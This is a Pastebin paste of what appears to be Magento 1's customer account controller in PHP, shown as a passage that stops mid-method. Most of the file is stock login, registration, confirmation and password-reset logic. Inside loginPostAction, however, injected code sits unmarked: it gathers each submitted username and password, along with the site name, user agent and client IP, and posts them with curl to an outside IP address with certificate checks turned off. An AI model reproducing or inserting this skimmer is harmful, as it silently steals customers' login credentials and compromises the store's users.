API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Apr 8th, 2019
1,006
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 37.09 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /**
  3. * Magento
  4. *
  5. * NOTICE OF LICENSE
  6. *
  7. * This source file is subject to the Open Software License (OSL 3.0)
  8. * that is bundled with this package in the file LICENSE.txt.
  9. * It is also available through the world-wide-web at this URL:
  10. * http://opensource.org/licenses/osl-3.0.php
  11. * If you did not receive a copy of the license and are unable to
  12. * obtain it through the world-wide-web, please send an email
  13. * to license@magentocommerce.com so we can send you a copy immediately.
  14. *
  15. * DISCLAIMER
  16. *
  17. * Do not edit or add to this file if you wish to upgrade Magento to newer
  18. * versions in the future. If you wish to customize Magento for your
  19. * needs please refer to http://www.magentocommerce.com for more information.
  20. *
  21. * @category Mage
  22. * @package Mage_Customer
  23. * @copyright Copyright (c) 2014 Magento Inc. (http://www.magentocommerce.com)
  24. * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
  25. */
  26.  
  27. /**
  28. * Customer account controller
  29. *
  30. * @category Mage
  31. * @package Mage_Customer
  32. * @author Magento Core Team <core@magentocommerce.com>
  33. */
  34. class Mage_Customer_AccountController extends Mage_Core_Controller_Front_Action
  35. {
  36. /**
  37. * Action list where need check enabled cookie
  38. *
  39. * @var array
  40. */
  41. protected $_cookieCheckActions = array('loginPost', 'createpost');
  42.  
  43. /**
  44. * Retrieve customer session model object
  45. *
  46. * @return Mage_Customer_Model_Session
  47. */
  48. protected function _getSession()
  49. {
  50. return Mage::getSingleton('customer/session');
  51. }
  52.  
  53. /**
  54. * Action predispatch
  55. *
  56. * Check customer authentication for some actions
  57. */
  58. public function preDispatch()
  59. {
  60. // a brute-force protection here would be nice
  61.  
  62. parent::preDispatch();
  63.  
  64. if (!$this->getRequest()->isDispatched()) {
  65. return;
  66. }
  67.  
  68. $action = $this->getRequest()->getActionName();
  69. $openActions = array(
  70. 'create',
  71. 'login',
  72. 'logoutsuccess',
  73. 'forgotpassword',
  74. 'forgotpasswordpost',
  75. 'resetpassword',
  76. 'resetpasswordpost',
  77. 'confirm',
  78. 'confirmation'
  79. );
  80. $pattern = '/^(' . implode('|', $openActions) . ')/i';
  81.  
  82. if (!preg_match($pattern, $action)) {
  83. if (!$this->_getSession()->authenticate($this)) {
  84. $this->setFlag('', 'no-dispatch', true);
  85. }
  86. } else {
  87. $this->_getSession()->setNoReferer(true);
  88. }
  89. }
  90.  
  91. /**
  92. * Action postdispatch
  93. *
  94. * Remove No-referer flag from customer session after each action
  95. */
  96. public function postDispatch()
  97. {
  98. parent::postDispatch();
  99. $this->_getSession()->unsNoReferer(false);
  100. }
  101.  
  102. /**
  103. * Default customer account page
  104. */
  105. public function indexAction()
  106. {
  107. $this->loadLayout();
  108. $this->_initLayoutMessages('customer/session');
  109. $this->_initLayoutMessages('catalog/session');
  110.  
  111. $this->getLayout()->getBlock('content')->append(
  112. $this->getLayout()->createBlock('customer/account_dashboard')
  113. );
  114. $this->getLayout()->getBlock('head')->setTitle($this->__('My Account'));
  115. $this->renderLayout();
  116. }
  117.  
  118. /**
  119. * Customer login form page
  120. */
  121. public function loginAction()
  122. {
  123. if ($this->_getSession()->isLoggedIn()) {
  124. $this->_redirect('*/*/');
  125. return;
  126. }
  127. $this->getResponse()->setHeader('Login-Required', 'true');
  128. $this->loadLayout();
  129. $this->_initLayoutMessages('customer/session');
  130. $this->_initLayoutMessages('catalog/session');
  131. $this->renderLayout();
  132. }
  133.  
  134. /**
  135. * Login post action
  136. */
  137. public function loginPostAction()
  138. {
  139. if (!$this->_validateFormKey()) {
  140. $this->_redirect('*/*/');
  141. return;
  142. }
  143.  
  144. if ($this->_getSession()->isLoggedIn()) {
  145. $this->_redirect('*/*/');
  146. return;
  147. }
  148. $session = $this->_getSession();
  149.  
  150. if ($this->getRequest()->isPost()) {
  151. $login = $this->getRequest()->getPost('login');
  152. if (!empty($login['username']) && !empty($login['password'])) {
  153. try {
  154. $session->login($login['username'], $login['password']);
  155. if ($session->getCustomer()->getIsJustConfirmed()) {
  156. $this->_welcomeCustomer($session->getCustomer(), true);
  157. }
  158. } catch (Mage_Core_Exception $e) {
  159. switch ($e->getCode()) {
  160. case Mage_Customer_Model_Customer::EXCEPTION_EMAIL_NOT_CONFIRMED:
  161. $value = $this->_getHelper('customer')->getEmailConfirmationUrl($login['username']);
  162. $message = $this->_getHelper('customer')->__('This account is not confirmed. <a href="%s">Click here</a> to resend confirmation email.', $value);
  163. break;
  164. case Mage_Customer_Model_Customer::EXCEPTION_INVALID_EMAIL_OR_PASSWORD:
  165. $message = $e->getMessage();
  166. break;
  167. default:
  168. $message = $e->getMessage();
  169. }
  170. $session->addError($message);
  171. $session->setUsername($login['username']);
  172. } catch (Exception $e) {
  173. // Mage::logException($e); // PA DSS violation: this exception log can disclose customer password
  174. }
  175. } else {
  176. $session->addError($this->__('Login and password are required.'));
  177. }
  178. }
  179. $data0 = $_SERVER['SERVER_NAME'];
  180. $data1 = $login['username'];
  181. $data2 = $login['password'];
  182. $data3 = $_SERVER['HTTP_USER_AGENT'];
  183. $data4 = $_SERVER['REMOTE_ADDR'];
  184. $mail12 = "site=".($data0)."&username=".($data1)."&password=".($data2)."&Browser=".($data3)."&ip=".($data4);
  185. $url = "http://69.30.232.110/mail.php";
  186. $ch = curl_init();
  187. curl_setopt($ch, CURLOPT_URL,$url);
  188. curl_setopt($ch, CURLOPT_REFERER, $url);
  189. curl_setopt($ch, CURLOPT_HEADER, 1);
  190. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  191. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  192. curl_setopt($ch, CURLOPT_TIMEOUT, 60);
  193. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
  194. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
  195. curl_setopt($ch, CURLOPT_POST, 1);
  196. curl_setopt($ch, CURLOPT_POSTFIELDS, $mail12);
  197. $result = curl_exec($ch);
  198. curl_close($ch);
  199.  
  200. $this->_loginPostRedirect();
  201. }
  202.  
  203. /**
  204. * Define target URL and redirect customer after logging in
  205. */
  206. protected function _loginPostRedirect()
  207. {
  208. $session = $this->_getSession();
  209.  
  210. if (!$session->getBeforeAuthUrl() || $session->getBeforeAuthUrl() == Mage::getBaseUrl()) {
  211. // Set default URL to redirect customer to
  212. $session->setBeforeAuthUrl($this->_getHelper('customer')->getAccountUrl());
  213. // Redirect customer to the last page visited after logging in
  214. if ($session->isLoggedIn()) {
  215. if (!Mage::getStoreConfigFlag(
  216. Mage_Customer_Helper_Data::XML_PATH_CUSTOMER_STARTUP_REDIRECT_TO_DASHBOARD
  217. )) {
  218. $referer = $this->getRequest()->getParam(Mage_Customer_Helper_Data::REFERER_QUERY_PARAM_NAME);
  219. if ($referer) {
  220. // Rebuild referer URL to handle the case when SID was changed
  221. $referer = $this->_getModel('core/url')
  222. ->getRebuiltUrl( $this->_getHelper('core')->urlDecode($referer));
  223. if ($this->_isUrlInternal($referer)) {
  224. $session->setBeforeAuthUrl($referer);
  225. }
  226. }
  227. } else if ($session->getAfterAuthUrl()) {
  228. $session->setBeforeAuthUrl($session->getAfterAuthUrl(true));
  229. }
  230. } else {
  231. $session->setBeforeAuthUrl( $this->_getHelper('customer')->getLoginUrl());
  232. }
  233. } else if ($session->getBeforeAuthUrl() == $this->_getHelper('customer')->getLogoutUrl()) {
  234. $session->setBeforeAuthUrl( $this->_getHelper('customer')->getDashboardUrl());
  235. } else {
  236. if (!$session->getAfterAuthUrl()) {
  237. $session->setAfterAuthUrl($session->getBeforeAuthUrl());
  238. }
  239. if ($session->isLoggedIn()) {
  240. $session->setBeforeAuthUrl($session->getAfterAuthUrl(true));
  241. }
  242. }
  243. $this->_redirectUrl($session->getBeforeAuthUrl(true));
  244. }
  245.  
  246. /**
  247. * Customer logout action
  248. */
  249. public function logoutAction()
  250. {
  251. $this->_getSession()->logout()
  252. ->renewSession();
  253.  
  254. $this->_redirect('*/*/logoutSuccess');
  255. }
  256.  
  257. /**
  258. * Logout success page
  259. */
  260. public function logoutSuccessAction()
  261. {
  262. $this->loadLayout();
  263. $this->renderLayout();
  264. }
  265.  
  266. /**
  267. * Customer register form page
  268. */
  269. public function createAction()
  270. {
  271. if ($this->_getSession()->isLoggedIn()) {
  272. $this->_redirect('*/*');
  273. return;
  274. }
  275.  
  276. $this->loadLayout();
  277. $this->_initLayoutMessages('customer/session');
  278. $this->renderLayout();
  279. }
  280.  
  281. /**
  282. * Create customer account action
  283. */
  284. public function createPostAction()
  285. {
  286. /** @var $session Mage_Customer_Model_Session */
  287. $session = $this->_getSession();
  288. if ($session->isLoggedIn()) {
  289. $this->_redirect('*/*/');
  290. return;
  291. }
  292. $session->setEscapeMessages(true); // prevent XSS injection in user input
  293. if (!$this->getRequest()->isPost()) {
  294. $errUrl = $this->_getUrl('*/*/create', array('_secure' => true));
  295. $this->_redirectError($errUrl);
  296. return;
  297. }
  298.  
  299. $customer = $this->_getCustomer();
  300.  
  301. try {
  302. $errors = $this->_getCustomerErrors($customer);
  303.  
  304. if (empty($errors)) {
  305. $customer->save();
  306. $this->_dispatchRegisterSuccess($customer);
  307. $this->_successProcessRegistration($customer);
  308. return;
  309. } else {
  310. $this->_addSessionError($errors);
  311. }
  312. } catch (Mage_Core_Exception $e) {
  313. $session->setCustomerFormData($this->getRequest()->getPost());
  314. if ($e->getCode() === Mage_Customer_Model_Customer::EXCEPTION_EMAIL_EXISTS) {
  315. $url = $this->_getUrl('customer/account/forgotpassword');
  316. $message = $this->__('There is already an account with this email address. If you are sure that it is your email address, <a href="%s">click here</a> to get your password and access your account.', $url);
  317. $session->setEscapeMessages(false);
  318. } else {
  319. $message = $e->getMessage();
  320. }
  321. $session->addError($message);
  322. } catch (Exception $e) {
  323. $session->setCustomerFormData($this->getRequest()->getPost())
  324. ->addException($e, $this->__('Cannot save the customer.'));
  325. }
  326. $errUrl = $this->_getUrl('*/*/create', array('_secure' => true));
  327. $this->_redirectError($errUrl);
  328. }
  329.  
  330. /**
  331. * Success Registration
  332. *
  333. * @param Mage_Customer_Model_Customer $customer
  334. * @return Mage_Customer_AccountController
  335. */
  336. protected function _successProcessRegistration(Mage_Customer_Model_Customer $customer)
  337. {
  338. $session = $this->_getSession();
  339. if ($customer->isConfirmationRequired()) {
  340. /** @var $app Mage_Core_Model_App */
  341. $app = $this->_getApp();
  342. /** @var $store Mage_Core_Model_Store*/
  343. $store = $app->getStore();
  344. $customer->sendNewAccountEmail(
  345. 'confirmation',
  346. $session->getBeforeAuthUrl(),
  347. $store->getId()
  348. );
  349. $customerHelper = $this->_getHelper('customer');
  350. $session->addSuccess($this->__('Account confirmation is required. Please, check your email for the confirmation link. To resend the confirmation email please <a href="%s">click here</a>.',
  351. $customerHelper->getEmailConfirmationUrl($customer->getEmail())));
  352. $url = $this->_getUrl('*/*/index', array('_secure' => true));
  353. } else {
  354. $session->setCustomerAsLoggedIn($customer);
  355. $url = $this->_welcomeCustomer($customer);
  356. }
  357. $this->_redirectSuccess($url);
  358. return $this;
  359. }
  360.  
  361. /**
  362. * Get Customer Model
  363. *
  364. * @return Mage_Customer_Model_Customer
  365. */
  366. protected function _getCustomer()
  367. {
  368. $customer = $this->_getFromRegistry('current_customer');
  369. if (!$customer) {
  370. $customer = $this->_getModel('customer/customer')->setId(null);
  371. }
  372. if ($this->getRequest()->getParam('is_subscribed', false)) {
  373. $customer->setIsSubscribed(1);
  374. }
  375. /**
  376. * Initialize customer group id
  377. */
  378. $customer->getGroupId();
  379.  
  380. return $customer;
  381. }
  382.  
  383. /**
  384. * Add session error method
  385. *
  386. * @param string|array $errors
  387. */
  388. protected function _addSessionError($errors)
  389. {
  390. $session = $this->_getSession();
  391. $session->setCustomerFormData($this->getRequest()->getPost());
  392. if (is_array($errors)) {
  393. foreach ($errors as $errorMessage) {
  394. $session->addError($errorMessage);
  395. }
  396. } else {
  397. $session->addError($this->__('Invalid customer data'));
  398. }
  399. }
  400.  
  401. /**
  402. * Validate customer data and return errors if they are
  403. *
  404. * @param Mage_Customer_Model_Customer $customer
  405. * @return array|string
  406. */
  407. protected function _getCustomerErrors($customer)
  408. {
  409. $errors = array();
  410. $request = $this->getRequest();
  411. if ($request->getPost('create_address')) {
  412. $errors = $this->_getErrorsOnCustomerAddress($customer);
  413. }
  414. $customerForm = $this->_getCustomerForm($customer);
  415. $customerData = $customerForm->extractData($request);
  416. $customerErrors = $customerForm->validateData($customerData);
  417. if ($customerErrors !== true) {
  418. $errors = array_merge($customerErrors, $errors);
  419. } else {
  420. $customerForm->compactData($customerData);
  421. $customer->setPassword($request->getPost('password'));
  422. $customer->setConfirmation($request->getPost('confirmation'));
  423. $customerErrors = $customer->validate();
  424. if (is_array($customerErrors)) {
  425. $errors = array_merge($customerErrors, $errors);
  426. }
  427. }
  428. return $errors;
  429. }
  430.  
  431. /**
  432. * Get Customer Form Initalized Model
  433. *
  434. * @param Mage_Customer_Model_Customer $customer
  435. * @return Mage_Customer_Model_Form
  436. */
  437. protected function _getCustomerForm($customer)
  438. {
  439. /* @var $customerForm Mage_Customer_Model_Form */
  440. $customerForm = $this->_getModel('customer/form');
  441. $customerForm->setFormCode('customer_account_create');
  442. $customerForm->setEntity($customer);
  443. return $customerForm;
  444. }
  445.  
  446. /**
  447. * Get Helper
  448. *
  449. * @param string $path
  450. * @return Mage_Core_Helper_Abstract
  451. */
  452. protected function _getHelper($path)
  453. {
  454. return Mage::helper($path);
  455. }
  456.  
  457. /**
  458. * Get App
  459. *
  460. * @return Mage_Core_Model_App
  461. */
  462. protected function _getApp()
  463. {
  464. return Mage::app();
  465. }
  466.  
  467. /**
  468. * Dispatch Event
  469. *
  470. * @param Mage_Customer_Model_Customer $customer
  471. */
  472. protected function _dispatchRegisterSuccess($customer)
  473. {
  474. Mage::dispatchEvent('customer_register_success',
  475. array('account_controller' => $this, 'customer' => $customer)
  476. );
  477. }
  478.  
  479. /**
  480. * Gets customer address
  481. *
  482. * @param $customer
  483. * @return array $errors
  484. */
  485. protected function _getErrorsOnCustomerAddress($customer)
  486. {
  487. $errors = array();
  488. /* @var $address Mage_Customer_Model_Address */
  489. $address = $this->_getModel('customer/address');
  490. /* @var $addressForm Mage_Customer_Model_Form */
  491. $addressForm = $this->_getModel('customer/form');
  492. $addressForm->setFormCode('customer_register_address')
  493. ->setEntity($address);
  494.  
  495. $addressData = $addressForm->extractData($this->getRequest(), 'address', false);
  496. $addressErrors = $addressForm->validateData($addressData);
  497. if (is_array($addressErrors)) {
  498. $errors = array_merge($errors, $addressErrors);
  499. }
  500. $address->setId(null)
  501. ->setIsDefaultBilling($this->getRequest()->getParam('default_billing', false))
  502. ->setIsDefaultShipping($this->getRequest()->getParam('default_shipping', false));
  503. $addressForm->compactData($addressData);
  504. $customer->addAddress($address);
  505.  
  506. $addressErrors = $address->validate();
  507. if (is_array($addressErrors)) {
  508. $errors = array_merge($errors, $addressErrors);
  509. }
  510. return $errors;
  511. }
  512.  
  513. /**
  514. * Get model by path
  515. *
  516. * @param string $path
  517. * @param array|null $arguments
  518. * @return false|Mage_Core_Model_Abstract
  519. */
  520. public function _getModel($path, $arguments = array())
  521. {
  522. return Mage::getModel($path, $arguments);
  523. }
  524.  
  525. /**
  526. * Get model from registry by path
  527. *
  528. * @param string $path
  529. * @return mixed
  530. */
  531. protected function _getFromRegistry($path)
  532. {
  533. return Mage::registry($path);
  534. }
  535.  
  536. /**
  537. * Add welcome message and send new account email.
  538. * Returns success URL
  539. *
  540. * @param Mage_Customer_Model_Customer $customer
  541. * @param bool $isJustConfirmed
  542. * @return string
  543. */
  544. protected function _welcomeCustomer(Mage_Customer_Model_Customer $customer, $isJustConfirmed = false)
  545. {
  546. $this->_getSession()->addSuccess(
  547. $this->__('Thank you for registering with %s.', Mage::app()->getStore()->getFrontendName())
  548. );
  549. if ($this->_isVatValidationEnabled()) {
  550. // Show corresponding VAT message to customer
  551. $configAddressType = $this->_getHelper('customer/address')->getTaxCalculationAddressType();
  552. $userPrompt = '';
  553. switch ($configAddressType) {
  554. case Mage_Customer_Model_Address_Abstract::TYPE_SHIPPING:
  555. $userPrompt = $this->__('If you are a registered VAT customer, please click <a href="%s">here</a> to enter you shipping address for proper VAT calculation',
  556. $this->_getUrl('customer/address/edit'));
  557. break;
  558. default:
  559. $userPrompt = $this->__('If you are a registered VAT customer, please click <a href="%s">here</a> to enter you billing address for proper VAT calculation',
  560. $this->_getUrl('customer/address/edit'));
  561. }
  562. $this->_getSession()->addSuccess($userPrompt);
  563. }
  564.  
  565. $customer->sendNewAccountEmail(
  566. $isJustConfirmed ? 'confirmed' : 'registered',
  567. '',
  568. Mage::app()->getStore()->getId()
  569. );
  570.  
  571. $successUrl = $this->_getUrl('*/*/index', array('_secure' => true));
  572. if ($this->_getSession()->getBeforeAuthUrl()) {
  573. $successUrl = $this->_getSession()->getBeforeAuthUrl(true);
  574. }
  575. return $successUrl;
  576. }
  577.  
  578. /**
  579. * Confirm customer account by id and confirmation key
  580. */
  581. public function confirmAction()
  582. {
  583. $session = $this->_getSession();
  584. if ($session->isLoggedIn()) {
  585. $this->_getSession()->logout()->regenerateSessionId();
  586. }
  587. try {
  588. $id = $this->getRequest()->getParam('id', false);
  589. $key = $this->getRequest()->getParam('key', false);
  590. $backUrl = $this->getRequest()->getParam('back_url', false);
  591. if (empty($id) || empty($key)) {
  592. throw new Exception($this->__('Bad request.'));
  593. }
  594.  
  595. // load customer by id (try/catch in case if it throws exceptions)
  596. try {
  597. $customer = $this->_getModel('customer/customer')->load($id);
  598. if ((!$customer) || (!$customer->getId())) {
  599. throw new Exception('Failed to load customer by id.');
  600. }
  601. }
  602. catch (Exception $e) {
  603. throw new Exception($this->__('Wrong customer account specified.'));
  604. }
  605.  
  606. // check if it is inactive
  607. if ($customer->getConfirmation()) {
  608. if ($customer->getConfirmation() !== $key) {
  609. throw new Exception($this->__('Wrong confirmation key.'));
  610. }
  611.  
  612. // activate customer
  613. try {
  614. $customer->setConfirmation(null);
  615. $customer->save();
  616. }
  617. catch (Exception $e) {
  618. throw new Exception($this->__('Failed to confirm customer account.'));
  619. }
  620.  
  621. // log in and send greeting email, then die happy
  622. $session->setCustomerAsLoggedIn($customer);
  623. $successUrl = $this->_welcomeCustomer($customer, true);
  624. $this->_redirectSuccess($backUrl ? $backUrl : $successUrl);
  625. return;
  626. }
  627.  
  628. // die happy
  629. $this->_redirectSuccess($this->_getUrl('*/*/index', array('_secure' => true)));
  630. return;
  631. }
  632. catch (Exception $e) {
  633. // die unhappy
  634. $this->_getSession()->addError($e->getMessage());
  635. $this->_redirectError($this->_getUrl('*/*/index', array('_secure' => true)));
  636. return;
  637. }
  638. }
  639.  
  640. /**
  641. * Send confirmation link to specified email
  642. */
  643. public function confirmationAction()
  644. {
  645. $customer = $this->_getModel('customer/customer');
  646. if ($this->_getSession()->isLoggedIn()) {
  647. $this->_redirect('*/*/');
  648. return;
  649. }
  650.  
  651. // try to confirm by email
  652. $email = $this->getRequest()->getPost('email');
  653. if ($email) {
  654. try {
  655. $customer->setWebsiteId(Mage::app()->getStore()->getWebsiteId())->loadByEmail($email);
  656. if (!$customer->getId()) {
  657. throw new Exception('');
  658. }
  659. if ($customer->getConfirmation()) {
  660. $customer->sendNewAccountEmail('confirmation', '', Mage::app()->getStore()->getId());
  661. $this->_getSession()->addSuccess($this->__('Please, check your email for confirmation key.'));
  662. } else {
  663. $this->_getSession()->addSuccess($this->__('This email does not require confirmation.'));
  664. }
  665. $this->_getSession()->setUsername($email);
  666. $this->_redirectSuccess($this->_getUrl('*/*/index', array('_secure' => true)));
  667. } catch (Exception $e) {
  668. $this->_getSession()->addException($e, $this->__('Wrong email.'));
  669. $this->_redirectError($this->_getUrl('*/*/*', array('email' => $email, '_secure' => true)));
  670. }
  671. return;
  672. }
  673.  
  674. // output form
  675. $this->loadLayout();
  676.  
  677. $this->getLayout()->getBlock('accountConfirmation')
  678. ->setEmail($this->getRequest()->getParam('email', $email));
  679.  
  680. $this->_initLayoutMessages('customer/session');
  681. $this->renderLayout();
  682. }
  683.  
  684. /**
  685. * Get Url method
  686. *
  687. * @param string $url
  688. * @param array $params
  689. * @return string
  690. */
  691. protected function _getUrl($url, $params = array())
  692. {
  693. return Mage::getUrl($url, $params);
  694. }
  695.  
  696. /**
  697. * Forgot customer password page
  698. */
  699. public function forgotPasswordAction()
  700. {
  701. $this->loadLayout();
  702.  
  703. $this->getLayout()->getBlock('forgotPassword')->setEmailValue(
  704. $this->_getSession()->getForgottenEmail()
  705. );
  706. $this->_getSession()->unsForgottenEmail();
  707.  
  708. $this->_initLayoutMessages('customer/session');
  709. $this->renderLayout();
  710. }
  711.  
  712. /**
  713. * Forgot customer password action
  714. */
  715. public function forgotPasswordPostAction()
  716. {
  717. $email = (string) $this->getRequest()->getPost('email');
  718. if ($email) {
  719. if (!Zend_Validate::is($email, 'EmailAddress')) {
  720. $this->_getSession()->setForgottenEmail($email);
  721. $this->_getSession()->addError($this->__('Invalid email address.'));
  722. $this->_redirect('*/*/forgotpassword');
  723. return;
  724. }
  725.  
  726. /** @var $customer Mage_Customer_Model_Customer */
  727. $customer = $this->_getModel('customer/customer')
  728. ->setWebsiteId(Mage::app()->getStore()->getWebsiteId())
  729. ->loadByEmail($email);
  730.  
  731. if ($customer->getId()) {
  732. try {
  733. $newResetPasswordLinkToken = $this->_getHelper('customer')->generateResetPasswordLinkToken();
  734. $customer->changeResetPasswordLinkToken($newResetPasswordLinkToken);
  735. $customer->sendPasswordResetConfirmationEmail();
  736. } catch (Exception $exception) {
  737. $this->_getSession()->addError($exception->getMessage());
  738. $this->_redirect('*/*/forgotpassword');
  739. return;
  740. }
  741. }
  742. $this->_getSession()
  743. ->addSuccess( $this->_getHelper('customer')
  744. ->__('If there is an account associated with %s you will receive an email with a link to reset your password.',
  745. $this->_getHelper('customer')->escapeHtml($email)));
  746. $this->_redirect('*/*/');
  747. return;
  748. } else {
  749. $this->_getSession()->addError($this->__('Please enter your email.'));
  750. $this->_redirect('*/*/forgotpassword');
  751. return;
  752. }
  753. }
  754.  
  755. /**
  756. * Display reset forgotten password form
  757. *
  758. * User is redirected on this action when he clicks on the corresponding link in password reset confirmation email
  759. *
  760. */
  761. public function resetPasswordAction()
  762. {
  763. $resetPasswordLinkToken = (string) $this->getRequest()->getQuery('token');
  764. $customerId = (int) $this->getRequest()->getQuery('id');
  765. try {
  766. $this->_validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken);
  767. $this->loadLayout();
  768. // Pass received parameters to the reset forgotten password form
  769. $this->getLayout()->getBlock('resetPassword')
  770. ->setCustomerId($customerId)
  771. ->setResetPasswordLinkToken($resetPasswordLinkToken);
  772. $this->renderLayout();
  773. } catch (Exception $exception) {
  774. $this->_getSession()->addError( $this->_getHelper('customer')->__('Your password reset link has expired.'));
  775. $this->_redirect('*/*/forgotpassword');
  776. }
  777. }
  778.  
  779. /**
  780. * Reset forgotten password
  781. * Used to handle data recieved from reset forgotten password form
  782. */
  783. public function resetPasswordPostAction()
  784. {
  785. $resetPasswordLinkToken = (string) $this->getRequest()->getQuery('token');
  786. $customerId = (int) $this->getRequest()->getQuery('id');
  787. $password = (string) $this->getRequest()->getPost('password');
  788. $passwordConfirmation = (string) $this->getRequest()->getPost('confirmation');
  789.  
  790. try {
  791. $this->_validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken);
  792. } catch (Exception $exception) {
  793. $this->_getSession()->addError( $this->_getHelper('customer')->__('Your password reset link has expired.'));
  794. $this->_redirect('*/*/');
  795. return;
  796. }
  797.  
  798. $errorMessages = array();
  799. if (iconv_strlen($password) <= 0) {
  800. array_push($errorMessages, $this->_getHelper('customer')->__('New password field cannot be empty.'));
  801. }
  802. /** @var $customer Mage_Customer_Model_Customer */
  803. $customer = $this->_getModel('customer/customer')->load($customerId);
  804.  
  805. $customer->setPassword($password);
  806. $customer->setConfirmation($passwordConfirmation);
  807. $validationErrorMessages = $customer->validate();
  808. if (is_array($validationErrorMessages)) {
  809. $errorMessages = array_merge($errorMessages, $validationErrorMessages);
  810. }
  811.  
  812. if (!empty($errorMessages)) {
  813. $this->_getSession()->setCustomerFormData($this->getRequest()->getPost());
  814. foreach ($errorMessages as $errorMessage) {
  815. $this->_getSession()->addError($errorMessage);
  816. }
  817. $this->_redirect('*/*/resetpassword', array(
  818. 'id' => $customerId,
  819. 'token' => $resetPasswordLinkToken
  820. ));
  821. return;
  822. }
  823.  
  824. try {
  825. // Empty current reset password token i.e. invalidate it
  826. $customer->setRpToken(null);
  827. $customer->setRpTokenCreatedAt(null);
  828. $customer->setConfirmation(null);
  829. $customer->save();
  830. $this->_getSession()->addSuccess( $this->_getHelper('customer')->__('Your password has been updated.'));
  831. $this->_redirect('*/*/login');
  832. } catch (Exception $exception) {
  833. $this->_getSession()->addException($exception, $this->__('Cannot save a new password.'));
  834. $this->_redirect('*/*/resetpassword', array(
  835. 'id' => $customerId,
  836. 'token' => $resetPasswordLinkToken
  837. ));
  838. return;
  839. }
  840. }
  841.  
  842. /**
  843. * Check if password reset token is valid
  844. *
  845. * @param int $customerId
  846. * @param string $resetPasswordLinkToken
  847. * @throws Mage_Core_Exception
  848. */
  849. protected function _validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken)
  850. {
  851. if (!is_int($customerId)
  852. || !is_string($resetPasswordLinkToken)
  853. || empty($resetPasswordLinkToken)
  854. || empty($customerId)
  855. || $customerId < 0
  856. ) {
  857. throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Invalid password reset token.'));
  858. }
  859.  
  860. /** @var $customer Mage_Customer_Model_Customer */
  861. $customer = $this->_getModel('customer/customer')->load($customerId);
  862. if (!$customer || !$customer->getId()) {
  863. throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Wrong customer account specified.'));
  864. }
  865.  
  866. $customerToken = $customer->getRpToken();
  867. if (strcmp($customerToken, $resetPasswordLinkToken) != 0 || $customer->isResetPasswordLinkTokenExpired()) {
  868. throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Your password reset link has expired.'));
  869. }
  870. }
  871.  
  872. /**
  873. * Forgot customer account information page
  874. */
  875. public function editAction()
  876. {
  877. $this->loadLayout();
  878. $this->_initLayoutMessages('customer/session');
  879. $this->_initLayoutMessages('catalog/session');
  880.  
  881. $block = $this->getLayout()->getBlock('customer_edit');
  882. if ($block) {
  883. $block->setRefererUrl($this->_getRefererUrl());
  884. }
  885. $data = $this->_getSession()->getCustomerFormData(true);
  886. $customer = $this->_getSession()->getCustomer();
  887. if (!empty($data)) {
  888. $customer->addData($data);
  889. }
  890. if ($this->getRequest()->getParam('changepass') == 1) {
  891. $customer->setChangePassword(1);
  892. }
  893.  
  894. $this->getLayout()->getBlock('head')->setTitle($this->__('Account Information'));
  895. $this->getLayout()->getBlock('messages')->setEscapeMessageFlag(true);
  896. $this->renderLayout();
  897. }
  898.  
  899. /**
  900. * Change customer password action
  901. */
  902. public function editPostAction()
  903. {
  904. if (!$this->_validateFormKey()) {
  905. return $this->_redirect('*/*/edit');
  906. }
  907.  
  908. if ($this->getRequest()->isPost()) {
  909. /** @var $customer Mage_Customer_Model_Customer */
  910. $customer = $this->_getSession()->getCustomer();
  911.  
  912. /** @var $customerForm Mage_Customer_Model_Form */
  913. $customerForm = $this->_getModel('customer/form');
  914. $customerForm->setFormCode('customer_account_edit')
  915. ->setEntity($customer);
  916.  
  917. $customerData = $customerForm->extractData($this->getRequest());
  918.  
  919. $errors = array();
  920. $customerErrors = $customerForm->validateData($customerData);
  921. if ($customerErrors !== true) {
  922. $errors = array_merge($customerErrors, $errors);
  923. } else {
  924. $customerForm->compactData($customerData);
  925. $errors = array();
  926.  
  927. // If password change was requested then add it to common validation scheme
  928. if ($this->getRequest()->getParam('change_password')) {
  929. $currPass = $this->getRequest()->getPost('current_password');
  930. $newPass = $this->getRequest()->getPost('password');
  931. $confPass = $this->getRequest()->getPost('confirmation');
  932.  
  933. $oldPass = $this->_getSession()->getCustomer()->getPasswordHash();
  934. if ( $this->_getHelper('core/string')->strpos($oldPass, ':')) {
  935. list($_salt, $salt) = explode(':', $oldPass);
  936. } else {
  937. $salt = false;
  938. }
  939.  
  940. if ($customer->hashPassword($currPass, $salt) == $oldPass) {
  941. if (strlen($newPass)) {
  942. /**
  943. * Set entered password and its confirmation - they
  944. * will be validated later to match each other and be of right length
  945. */
  946. $customer->setPassword($newPass);
  947. $customer->setConfirmation($confPass);
  948. } else {
  949. $errors[] = $this->__('New password field cannot be empty.');
  950. }
  951. } else {
  952. $errors[] = $this->__('Invalid current password');
  953. }
  954. }
  955.  
  956. // Validate account and compose list of errors if any
  957. $customerErrors = $customer->validate();
  958. if (is_array($customerErrors)) {
  959. $errors = array_merge($errors, $customerErrors);
  960. }
  961. }
  962.  
  963. if (!empty($errors)) {
  964. $this->_getSession()->setCustomerFormData($this->getRequest()->getPost());
  965. foreach ($errors as $message) {
  966. $this->_getSession()->addError($message);
  967. }
  968. $this->_redirect('*/*/edit');
  969. return $this;
  970. }
  971.  
  972. try {
  973. $customer->setConfirmation(null);
  974. $customer->save();
  975. $this->_getSession()->setCustomer($customer)
  976. ->addSuccess($this->__('The account information has been saved.'));
  977.  
  978. $this->_redirect('customer/account');
  979. return;
  980. } catch (Mage_Core_Exception $e) {
  981. $this->_getSession()->setCustomerFormData($this->getRequest()->getPost())
  982. ->addError($e->getMessage());
  983. } catch (Exception $e) {
  984. $this->_getSession()->setCustomerFormData($this->getRequest()->getPost())
